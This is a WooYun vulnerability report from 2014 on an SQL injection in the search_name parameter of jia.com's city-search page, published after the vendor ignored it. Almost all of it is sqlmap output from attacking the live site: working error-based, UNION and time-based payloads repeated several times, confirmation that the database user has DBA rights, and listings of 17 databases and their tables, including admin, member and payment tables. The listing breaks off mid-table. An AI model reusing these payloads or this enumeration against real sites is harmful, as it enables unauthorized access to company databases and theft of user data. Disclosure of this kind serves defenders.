当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064387

漏洞标题:齐家网DBA类SQL注入一枚

相关厂商:www.jia.com

漏洞作者: 追逐天堂

提交时间:2014-06-13 10:54

修复时间:2014-06-18 10:55

公开时间:2014-06-18 10:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-13: 细节已通知厂商并且等待厂商处理中
2014-06-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

既然有网站,就应该不会忽略吧.....齐家网也蛮大的

详细说明:

地址:http://www.jia.com/citylist/search.php?callback=?&search_name=1


1.png


2.png


3.png


4.png

漏洞证明:

sqlmap identified the following injection points with a total of 274 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
available databases [17]:
[*] _del_access_ip_count_20140609bak
[*] _del_xi1_20140609bak
[*] _del_xiuxiu.a_20140609bak
[*] _del_xiuxiu_cms_20140609bak
[*] _del_zhuangxiu.18.52_20140609bak
[*] _del_zsa_20140609bak
[*] _del_zx_20140609bak
[*] _del_zx_bak519_20140609bak
[*] _del_zx_public_20140609bak
[*] aabb
[*] ConfigDB
[*] diaoding
[*] information_schema
[*] mysql
[*] test
[*] xiuxiu
[*] zhuangxiu
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
current user is DBA: True
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
current database: 'zhuangxiu'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
current user: 'zhuangxiudb@10.10.20.%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: search_name
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: callback=?&search_name=1' AND (SELECT 2336 FROM(SELECT COUNT(*),CONCAT(0x7166686d71,(SELECT (CASE WHEN (2336=2336) THEN 1 ELSE 0 END)),0x716e676d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RpoS'='RpoS
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: callback=?&search_name=1' UNION ALL SELECT CONCAT(0x7166686d71,0x776a526d504b6852754c,0x716e676d71),NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: callback=?&search_name=1' AND 7074=BENCHMARK(5000000,MD5(0x67754445)) AND 'XAiw'='XAiw
---
web application technology: PHP 5.3.10
back-end DBMS: MySQL 5.0
Database: _del_zx_bak519_20140609bak
[85 tables]
+---------------------------------------+
| OS_Contact |
| n_crm_supervision |
| n_crm_user |
| pos_99bill_log |
| tag_relation |
| zx_activity |
| zx_ad |
| zx_ad_home |
| zx_ad_home_18 |
| zx_ad_home_bak |
| zx_ad_keyword |
| zx_ad_manage |
| zx_admin_log |
| zx_admin_role |
| zx_admin_user |
| zx_answer |
| zx_apply |
| zx_apply_build |
| zx_areaflag |
| zx_build |
| zx_build_log |
| zx_channel_all |
| zx_channel_data |
| zx_channel_detail |
| zx_collect |
| zx_collect_cat |
| zx_comment |
| zx_comment_cat |
| zx_count |
| zx_dbs_koubei |
| zx_designer |
| zx_diary |
| zx_diary_extra |
| zx_focus |
| zx_gallery |
| zx_hxt |
| zx_jia |
| zx_koubei_log |
| zx_koubei_preadd |
| zx_message |
| zx_mobile_areacode |
| zx_money_day |
| zx_money_moth |
| zx_order |
| zx_order_crm_log |
| zx_order_extend |
| zx_order_join |
| zx_order_modify |
| zx_order_reject |
| zx_order_remark |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_qijiabao |
| zx_question |
| zx_recom_data |
| zx_regions |
| zx_report |
| zx_report_20120601 |
| zx_report_20120901 |
| zx_report_20121201 |
| zx_report_20130601 |
| zx_report_analysis |
| zx_report_manage |
| zx_salespromotion |
| zx_serve_data |
| zx_shop |
| zx_shop_class |
| zx_shop_cuxiao |
| zx_shop_extra |
| zx_shop_extra_jia |
| zx_shop_id_relation |
| zx_shop_jia |
| zx_shop_log |
| zx_shop_money |
| zx_shop_notice |
| zx_sms_call_back |
| zx_supervisor |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
| zx_tuku |
| zx_tuku_img |
| zx_tzsync_log |
+---------------------------------------+
Database: _del_zsa_20140609bak
[53 tables]
+---------------------------------------+
| tag_relation |
| zx_activity |
| zx_ad_keyword |
| zx_admin_role |
| zx_admin_user |
| zx_answer |
| zx_apply |
| zx_areaflag |
| zx_build |
| zx_collect |
| zx_collect_cat |
| zx_comment |
| zx_comment_cat |
| zx_count |
| zx_dbs_koubei |
| zx_designer |
| zx_focus |
| zx_gallery |
| zx_hxt |
| zx_jia |
| zx_koubei_log |
| zx_message |
| zx_mobile_areacode |
| zx_order |
| zx_order_crm_log |
| zx_order_extend |
| zx_order_join |
| zx_order_modify |
| zx_order_reject |
| zx_order_remark |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_question |
| zx_regions |
| zx_report_manage |
| zx_shop |
| zx_shop_class |
| zx_shop_cuxiao |
| zx_shop_extra |
| zx_shop_extra_jia |
| zx_shop_id_relation |
| zx_shop_jia |
| zx_shop_log |
| zx_shop_money |
| zx_shop_notice |
| zx_sms_call_back |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
| zx_tuku |
| zx_tuku_img |
+---------------------------------------+
Database: zhuangxiu
[173 tables]
+---------------------------------------+
| OS_Contact |
| alert_condition_query_view |
| alert_email_message_items_view |
| alert_pending_html_view |
| alert_pending_view |
| alert_view |
| custom_query_top_navigation_view |
| custom_query_view |
| dl_buding |
| n_crm_supervision |
| n_crm_user |
| n_crm_user1 |
| n_crm_user_1 |
| pos_99bill_log |
| sv_custom_chart_day |
| sv_custom_chart_flattened_day |
| sv_custom_chart_flattened_hour |
| sv_custom_chart_flattened_sample |
| sv_custom_chart_hour |
| sv_custom_chart_sample |
| sv_custom_html |
| sv_custom_html_brief |
| sv_day |
| sv_diff |
| sv_hour |
| sv_latest |
| sv_param_change |
| sv_parameter_change_union |
| sv_report_24_7 |
| sv_report_24_7_minmax |
| sv_report_chart_24_7 |
| sv_report_chart_day |
| sv_report_chart_day_labels |
| sv_report_chart_day_timeseries |
| sv_report_chart_hour |
| sv_report_chart_hour_labels |
| sv_report_chart_hour_timeseries |
| sv_report_chart_sample |
| sv_report_chart_sample_labels |
| sv_report_chart_sample_timeseries |
| sv_report_day |
| sv_report_day_recent |
| sv_report_day_recent_minmax |
| sv_report_hour |
| sv_report_hour_recent |
| sv_report_hour_recent_minmax |
| sv_report_html |
| sv_report_html_24_7 |
| sv_report_html_brief |
| sv_report_human_day |
| sv_report_human_hour |
| sv_report_human_sample |
| sv_report_sample |
| sv_report_sample_recent |
| sv_report_sample_recent_aggregated |
| sv_report_sample_recent_minmax |
| sv_sample |
| tag_relation |
| zx_activity |
| zx_ad |
| zx_ad_home |
| zx_ad_home_18 |
| zx_ad_home_bak |
| zx_ad_keyword |
| zx_ad_manage |
| zx_admin_log |
| zx_admin_role |
| zx_admin_user |
| zx_answer |
| zx_apply |
| zx_apply_build |
| zx_areaflag |
| zx_build |
| zx_build_callback |
| zx_build_log |
| zx_callback_questions |
| zx_channel_all |
| zx_channel_data |
| zx_channel_detail |
| zx_city_manage |
| zx_collect |
| zx_collect_cat |
| zx_comment |
| zx_comment1 |
| zx_comment2 |
| zx_comment_cat |
| zx_comment_flower |
| zx_count |
| zx_dbs_koubei |
| zx_designer |
| zx_designer_ad |
| zx_designer_apply |
| zx_designer_case |
| zx_designer_case20130619 |
| zx_designer_case_20130618 |
| zx_designer_case_bak |
| zx_diary |
| zx_diary_extra |
| zx_focus |
| zx_free_checkin |
| zx_gallery |
| zx_goldteam_personnel |
| zx_house_keeper |
| zx_hxt |
| zx_jia |
| zx_koubei_log |
| zx_koubei_preadd |
| zx_message |
| zx_mobile_areacode |
| zx_money_day |
| zx_money_moth |
| zx_non_ground_city |
| zx_non_ground_city1 |
| zx_non_ground_city_shop |
| zx_non_ground_information |
| zx_notice_board |
| zx_order |
| zx_order_9 |
| zx_order_bak |
| zx_order_crm30_log |
| zx_order_crm_log |
| zx_order_extend |
| zx_order_join |
| zx_order_modify |
| zx_order_price |
| zx_order_reject |
| zx_order_remark |
| zx_page_view |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_qijiabao |
| zx_question |
| zx_recom_data |
| zx_refund_order |
| zx_regions |
| zx_report |
| zx_report_20120601 |
| zx_report_20120901 |
| zx_report_20121201 |
| zx_report_20130601 |
| zx_report_20130701 |
| zx_report_20130801 |
| zx_report_analysis |
| zx_report_manage |
| zx_report_question |
| zx_salespromotion |
| zx_serve_data |
| zx_shop |
| zx_shop1 |
| zx_shop_1 |
| zx_shop_72 |
| zx_shop_api_log |
| zx_shop_class |
| zx_shop_cuxiao |
| zx_shop_extra |
| zx_shop_extra_jia |
| zx_shop_id_relation |
| zx_shop_jia |
| zx_shop_log |
| zx_shop_money |
| zx_shop_notice |
| zx_shop_other |
| zx_shop_user_log |
| zx_sms_call_back |
| zx_supervisor |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
| zx_tuku |
| zx_tuku_img |
| zx_tzsync_log |
+---------------------------------------+
Database: xiuxiu
[120 tables]
+---------------------------------------+
| DBS_Shop |
| DBS_Shop1 |
| DBS_Shop_Class |
| DBS_Shop_Cuxiao |
| DBS_Shop_Img |
| DBS_Shop_Img_Category |
| DBS_Shop_Img_list |
| DBS_Shop_Log |
| DBS_Shop_Pro |
| DBS_Shop_Pro_Category |
| DBS_Shop_Pro_Img |
| DBS_Shop_yuyuecount |
| ald_areashop_key |
| ald_areashop_key_59 |
| ald_areashop_key_72 |
| ald_areashop_key_bak |
| ald_baidu_image |
| ald_baidu_image_pic |
| ald_baidu_image_pic_bak |
| ald_data_analysis |
| ald_jia_key |
| ald_jia_key_72 |
| ald_jia_tuku |
| ald_jia_tuku_221 |
| ald_jia_tuku_bak |
| ald_shop_key |
| ald_shop_key_4_11 |
| ald_shop_key_4_23 |
| ald_shop_key_722 |
| ald_shop_key_bak |
| ald_shop_key_bak_58 |
| apply |
| apply_to_tag |
| area_info |
| db_jia |
| db_report |
| db_report_20120601 |
| db_report_20120901 |
| db_report_20121201 |
| dbs_activity |
| dbs_ad_keyword |
| dbs_ad_manage |
| dbs_ad_object |
| dbs_ad_picture |
| dbs_admin |
| dbs_admin_action |
| dbs_admin_extra |
| dbs_admin_log |
| dbs_build |
| dbs_comment |
| dbs_comment_category |
| dbs_crm_log |
| dbs_decorate_diary |
| dbs_designer |
| dbs_diary_extra |
| dbs_image |
| dbs_koubei_log |
| dbs_message |
| dbs_notice |
| dbs_picture |
| dbs_picture_category |
| dbs_picture_img |
| dbs_picture_tag_real |
| dbs_privilege |
| dbs_report_menu |
| dbs_report_number |
| dbs_report_option |
| dbs_reservation |
| dbs_role |
| dbs_shop |
| dbs_shop_11 |
| dbs_shop_423 |
| dbs_shop_72 |
| dbs_shop_apply |
| dbs_shop_bak |
| dbs_shop_class |
| dbs_shop_extra |
| dbs_shop_extra_bak |
| dbs_shop_log |
| dbs_shop_recom |
| dbs_sms |
| dbs_sms_call_back |
| dbs_supervisor |
| dbs_tag |
| dbs_tag_cat |
| dbs_tag_content |
| dbs_tag_real |
| dbs_tender |
| dbs_tender_crm_log |
| dbs_tender_income |
| dbs_tender_join |
| dbs_tender_lose_log |
| dbs_tender_modify |
| dbs_tender_plan |
| dbs_tender_reject |
| dbs_tender_reject_log |
| dbs_tender_repeat |
| dbs_tender_status |
| dbs_tuku |
| dbs_tuku_category |
| dbs_tuku_img |
| dbs_user |
| dbs_user_extra |
| dbs_user_extra_account |
| footer_info |
| mobile_areacode |
| regions |
| report_analysis |
| report_manage |
| role_to_privilege |
| shop_admin |
| shop_money |
| shop_money_log |
| shop_tender_introduction |
| site_confirm |
| site_nav |
| user_info |
| zx_report_20120901 |
| zx_report_20121201 |
| zx_report_analysis |
+---------------------------------------+
Database: _del_zx_public_20140609bak
[3 tables]
+---------------------------------------+
| pub_micro_letters |
| pub_weibo |
| weibo_user |
+---------------------------------------+
Database: _del_zx_20140609bak
[15 tables]
+---------------------------------------+
| dd_apply |
| dd_comment |
| zx_admin_log |
| zx_admin_nav |
| zx_admin_role |
| zx_admin_user |
| zx_areaflag |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_regions |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
+---------------------------------------+
Database: aabb
[293 tables]
+---------------------------------------+
| v9_news.bak.bak |
| access_ip |
| alert_condition_query_view |
| alert_email_message_items_view |
| alert_pending_html_view |
| alert_pending_view |
| alert_view |
| custom_query_top_navigation_view |
| custom_query_view |
| sv_custom_chart_day |
| sv_custom_chart_flattened_day |
| sv_custom_chart_flattened_hour |
| sv_custom_chart_flattened_sample |
| sv_custom_chart_hour |
| sv_custom_chart_sample |
| sv_custom_html |
| sv_custom_html_brief |
| sv_day |
| sv_diff |
| sv_hour |
| sv_latest |
| sv_param_change |
| sv_parameter_change_union |
| sv_report_24_7 |
| sv_report_24_7_minmax |
| sv_report_chart_24_7 |
| sv_report_chart_day |
| sv_report_chart_day_labels |
| sv_report_chart_day_timeseries |
| sv_report_chart_hour |
| sv_report_chart_hour_labels |
| sv_report_chart_hour_timeseries |
| sv_report_chart_sample |
| sv_report_chart_sample_labels |
| sv_report_chart_sample_timeseries |
| sv_report_day |
| sv_report_day_recent |
| sv_report_day_recent_minmax |
| sv_report_hour |
| sv_report_hour_recent |
| sv_report_hour_recent_minmax |
| sv_report_html |
| sv_report_html_24_7 |
| sv_report_html_brief |
| sv_report_human_day |
| sv_report_human_hour |
| sv_report_human_sample |
| sv_report_sample |
| sv_report_sample_recent |
| sv_report_sample_recent_aggregated |
| sv_report_sample_recent_minmax |
| sv_sample |
| v9_2014zx |
| v9_action_list |
| v9_action_signup |
| v9_admin |
| v9_admin_panel |
| v9_admin_role |
| v9_admin_role_priv |
| v9_aladdin_pictures |
| v9_announce |
| v9_areas |
| v9_attachment |
| v9_attachment_index |
| v9_badword |
| v9_block |
| v9_block_history |
| v9_block_priv |
| v9_brands |
| v9_cache |
| v9_category |
| v9_category1 |
| v9_category_priv |
| v9_channel |
| v9_channel_class |
| v9_channel_sub |
| v9_collection_content |
| v9_collection_history |
| v9_collection_node |
| v9_collection_program |
| v9_comment |
| v9_comment_bak |
| v9_comment_check |
| v9_comment_check_bak |
| v9_comment_data_1 |
| v9_comment_data_1_bak |
| v9_comment_data_reply |
| v9_comment_setting |
| v9_comment_setting_bak |
| v9_comment_table |
| v9_comment_table_bak |
| v9_comments |
| v9_content_check |
| v9_content_check_bak |
| v9_copyfrom |
| v9_cyber_pic |
| v9_cyber_pic_cookie |
| v9_cyber_pic_vote |
| v9_cyber_pic_vote_bak |
| v9_datacall |
| v9_dbs_tag_content |
| v9_dbs_tag_real |
| v9_dbsource |
| v9_dianping |
| v9_dianping_data |
| v9_dianping_type |
| v9_download |
| v9_download_data |
| v9_downservers |
| v9_extend_setting |
| v9_favorite |
| v9_fraction |
| v9_fraction_content |
| v9_hits |
| v9_imgs |
| v9_ipbanned |
| v9_jia_school |
| v9_jia_school_class |
| v9_jia_school_dianping |
| v9_jia_school_hot |
| v9_jia_school_like |
| v9_jia_school_pre |
| v9_jia_school_relation |
| v9_jia_school_scene |
| v9_jia_school_tips |
| v9_keylink |
| v9_keylink_bak |
| v9_keywords_url |
| v9_link |
| v9_linkage |
| v9_log |
| v9_member |
| v9_member_detail |
| v9_member_group |
| v9_member_menu |
| v9_member_verify |
| v9_member_vip |
| v9_menu |
| v9_message |
| v9_message_data |
| v9_message_group |
| v9_model |
| v9_model_field |
| v9_module |
| v9_mood |
| v9_news |
| v9_news_20140102 |
| v9_news_20140304 |
| v9_news_20140312 |
| v9_news_bi_content |
| v9_news_data |
| v9_news_data_20131023 |
| v9_news_data_20131106 |
| v9_news_data_20140102 |
| v9_news_data_20140304 |
| v9_news_data_20140312 |
| v9_news_data_20140520bak |
| v9_news_dg_iframe |
| v9_news_recommend |
| v9_page |
| v9_pay_account |
| v9_pay_payment |
| v9_pay_spend |
| v9_picture |
| v9_picture_20131129bak |
| v9_picture_20131210 |
| v9_picture_20140312 |
| v9_picture_ad |
| v9_picture_data |
| v9_picture_data_20131010 |
| v9_picture_data_20131129bak |
| v9_picture_data_20131210 |
| v9_picture_data_20140114 |
| v9_picture_data_20140312 |
| v9_picture_designer |
| v9_picture_favorclass |
| v9_picture_favorite |
| v9_picture_favorite_20131016 |
| v9_picture_goods |
| v9_picture_stat |
| v9_picture_virtual |
| v9_picture_water_duiying |
| v9_plugin |
| v9_plugin_var |
| v9_position |
| v9_position_data |
| v9_poster |
| v9_poster_201202 |
| v9_poster_201204 |
| v9_poster_201205 |
| v9_poster_201206 |
| v9_poster_201207 |
| v9_poster_201208 |
| v9_poster_201210 |
| v9_poster_201212 |
| v9_poster_201301 |
| v9_poster_201303 |
| v9_poster_201304 |
| v9_poster_201305 |
| v9_poster_201306 |
| v9_poster_201307 |
| v9_poster_201308 |
| v9_poster_201309 |
| v9_poster_201310 |
| v9_poster_201311 |
| v9_poster_201312 |
| v9_poster_201401 |
| v9_poster_201403 |
| v9_poster_201404 |
| v9_poster_space |
| v9_product_img |
| v9_product_info |
| v9_queue |
| v9_recruit_area |
| v9_recruit_job |
| v9_recruit_position |
| v9_release_point |
| v9_sale_action |
| v9_sale_action_bind |
| v9_sale_action_cate |
| v9_sale_shop |
| v9_sale_shop_cate |
| v9_sale_shop_info |
| v9_sale_shop_order |
| v9_search |
| v9_search_keyword |
| v9_session |
| v9_shops |
| v9_site |
| v9_sms_report |
| v9_special |
| v9_special_c_data |
| v9_special_content |
| v9_sphinx_counter |
| v9_sso_admin |
| v9_sso_applications |
| v9_sso_members |
| v9_sso_messagequeue |
| v9_sso_session |
| v9_sso_settings |
| v9_statistics |
| v9_tag |
| v9_tags |
| v9_tags_bak |
| v9_tags_content |
| v9_tags_content_1 |
| v9_tags_content_11 |
| v9_tags_content_2 |
| v9_tags_content_3 |
| v9_tags_content_4 |
| v9_tags_content_5 |
| v9_tags_content_6 |
| v9_tags_content_7 |
| v9_tags_content_8 |
| v9_tags_content_9 |
| v9_tags_convert |
| v9_tags_en |
| v9_tags_group |
| v9_tags_group2 |
| v9_tags_group_0625 |
| v9_tags_group_bak |
| v9_tags_group_flag |
| v9_tags_new |
| v9_tags_new_bak |
| v9_tags_new_content |
| v9_tags_new_content2 |
| v9_tags_new_recommend |
| v9_tags_picture |
| v9_template_bak |
| v9_times |
| v9_tmp_wap_tuku |
| v9_tmp_wap_tuku2 |
| v9_type |
| v9_urlrule |
| v9_vote_data |
| v9_vote_option |
| v9_vote_subject |
| v9_wap |
| v9_wap_type |
| v9_workflow |
| v9_zhuanjia_comment |
| v9_zhuanjia_experience |
| v9_zhuanjia_list |
| v9_zhuanjia_regions |
| v9_zhuanjia_tags |
| v9_zhuanjia_tags_bak |
| v9_zhuanjia_tags_link |
| v9_zhuanjia_tags_link_bak |
| v9_zhuanjia_tags_link_newest |
| v9_zhuanti_list |
| v9_zxbase |
| v9_zxbase_comment |
| v9_zxprocess |
+---------------------------------------+
Database: diaoding
[16 tables]
+---------------------------------------+
| dd_apply |
| dd_comment |
| dd_praise_hits |
| zx_admin_log |
| zx_admin_nav |
| zx_admin_role |
| zx_admin_user |
| zx_areaflag |
| zx_privilege |
| zx_privilege_nav |
| zx_privilege_role |
| zx_regions |
| zx_tag |
| zx_tag_cat |
| zx_tag_content |
| zx_tag_relation |
+---------------------------------------+
Database: _del_xi1_20140609bak
[75 tables]
+---------------------------------------+
| DBS_Shop |
| DBS_Shop1 |
| DBS_Shop_Class |
| DBS_Shop_Cuxiao |
| DBS_Shop_Img |
| DBS_Shop_Img_Category |
| DBS_Shop_Img_list |
| DBS_Shop_Log |
| DBS_Shop_Pro |
| DBS_Shop_Pro_Category |
| DBS_Shop_Pro_Img |
| DBS_Shop_yuyuecount |
| apply |
| apply_to_tag |
| area_info |
| db_jia |
| db_report |
| dbs_ad_keyword |
| dbs_ad_object |
| dbs_ad_picture |
| dbs_admin |
| dbs_admin_extra |
| dbs_admin_log |
| dbs_build |
| dbs_comment |
| dbs_comment_category |
| dbs_crm_log |
| dbs_decorate_diary |
| dbs_designer |
| dbs_diary_extra |
| dbs_image |
| dbs_koubei_log |
| dbs_message |
| dbs_picture |
| dbs_picture_category |
| dbs_picture_img |
| dbs_picture_tag_real |
| dbs_privilege |
| dbs_reservation |
| dbs_role |
| dbs_shop |
| dbs_shop_class |
| dbs_shop_extra |
| dbs_shop_log |
| dbs_shop_recom |
| dbs_sms |
| dbs_supervisor |
| dbs_tag |
| dbs_tag_cat |
| dbs_tag_content |
| dbs_tag_real |
| dbs_tender |
| dbs_tender_crm_log |
| dbs_tender_join |
| dbs_tender_lose_log |
| dbs_tender_modify |
| dbs_tender_plan |
| dbs_tender_status |
| dbs_tuku |
| dbs_tuku_category |
| dbs_tuku_img |
| dbs_user |
| dbs_user_extra |
| dbs_user_extra_account |
| footer_info |
| mobile_areacode |
| regions |
| report_analysis |
| report_manage |
| role_to_privilege |
| shop_admin |
| shop_money |
| shop_money_log |
| shop_tender_introduction |
| site_nav |
+---------------------------------------+
Database: _del_xiuxiu_cms_20140609bak
[92 tables]
+---------------------------------------+
| dede_addonarticle |
| dede_addonarticle1 |
| dede_addonimages |
| dede_addonimages1 |
| dede_addoninfos |
| dede_addonshop |
| dede_addonsoft |
| dede_addonspec |
| dede_admin |
| dede_admintype |
| dede_advancedsearch |
| dede_arcatt |
| dede_arccache |
| dede_archives |
| dede_archives1 |
| dede_arcmulti |
| dede_arcrank |
| dede_arctiny |
| dede_arctype |
| dede_area |
| dede_channeltype |
| dede_co_htmls |
| dede_co_mediaurls |
| dede_co_note |
| dede_co_onepage |
| dede_co_urls |
| dede_diyforms |
| dede_dl_log |
| dede_downloads |
| dede_erradd |
| dede_feedback |
| dede_flink |
| dede_flinktype |
| dede_freelist |
| dede_guestbook |
| dede_homepageset |
| dede_keywords |
| dede_log |
| dede_member |
| dede_member_company |
| dede_member_feed |
| dede_member_flink |
| dede_member_friends |
| dede_member_group |
| dede_member_guestbook |
| dede_member_model |
| dede_member_msg |
| dede_member_operation |
| dede_member_person |
| dede_member_pms |
| dede_member_snsmsg |
| dede_member_space |
| dede_member_stow |
| dede_member_stowtype |
| dede_member_tj |
| dede_member_type |
| dede_member_vhistory |
| dede_moneycard_record |
| dede_moneycard_type |
| dede_mtypes |
| dede_multiserv_config |
| dede_myad |
| dede_mytag |
| dede_payment |
| dede_plus |
| dede_purview |
| dede_pwd_tmp |
| dede_ratings |
| dede_scores |
| dede_search_cache |
| dede_search_keywords |
| dede_sgpage |
| dede_shops_delivery |
| dede_shops_orders |
| dede_shops_products |
| dede_shops_userinfo |
| dede_softconfig |
| dede_sphinx |
| dede_stepselect |
| dede_sys_enum |
| dede_sys_module |
| dede_sys_set |
| dede_sys_task |
| dede_sysconfig |
| dede_tag_relation |
| dede_tagindex |
| dede_taglist |
| dede_taglist1 |
| dede_uploads |
| dede_verifies |
| dede_vote |
| dede_vote_member |
+---------------------------------------+
Database: _del_xiuxiu.a_20140609bak
[98 tables]
+---------------------------------------+
| DBS_Shop |
| DBS_Shop1 |
| DBS_Shop_Class |
| DBS_Shop_Cuxiao |
| DBS_Shop_Img |
| DBS_Shop_Img_Category |
| DBS_Shop_Img_list |
| DBS_Shop_Log |
| DBS_Shop_Pro |
| DBS_Shop_Pro_Category |
| DBS_Shop_Pro_Img |
| DBS_Shop_yuyuecount |
| ald_areashop_key |
| ald_data_analysis |
| ald_jia_key |
| ald_jia_tuku |
| ald_shop_key |
| apply |
| apply_to_tag |
| area_info |
| db_jia |
| db_report |
| db_report_20120601 |
| db_report_20120901 |
| db_report_20121201 |
| dbs_activity |
| dbs_ad_keyword |
| dbs_ad_manage |
| dbs_ad_object |
| dbs_ad_picture |
| dbs_admin |
| dbs_admin_action |
| dbs_admin_extra |
| dbs_admin_log |
| dbs_build |
| dbs_comment |
| dbs_comment_category |
| dbs_crm_log |
| dbs_decorate_diary |
| dbs_designer |
| dbs_diary_extra |
| dbs_image |
| dbs_koubei_log |
| dbs_message |
| dbs_notice |
| dbs_picture |
| dbs_picture_category |
| dbs_picture_img |
| dbs_picture_tag_real |
| dbs_privilege |
| dbs_report_menu |
| dbs_report_number |
| dbs_report_option |
| dbs_reservation |
| dbs_role |
| dbs_shop |
| dbs_shop_apply |
| dbs_shop_class |
| dbs_shop_extra |
| dbs_shop_log |
| dbs_shop_recom |
| dbs_sms |
| dbs_sms_call_back |
| dbs_supervisor |
| dbs_tag |
| dbs_tag_cat |
| dbs_tag_content |
| dbs_tag_real |
| dbs_tender |
| dbs_tender_crm_log |
| dbs_tender_income |
| dbs_tender_join |
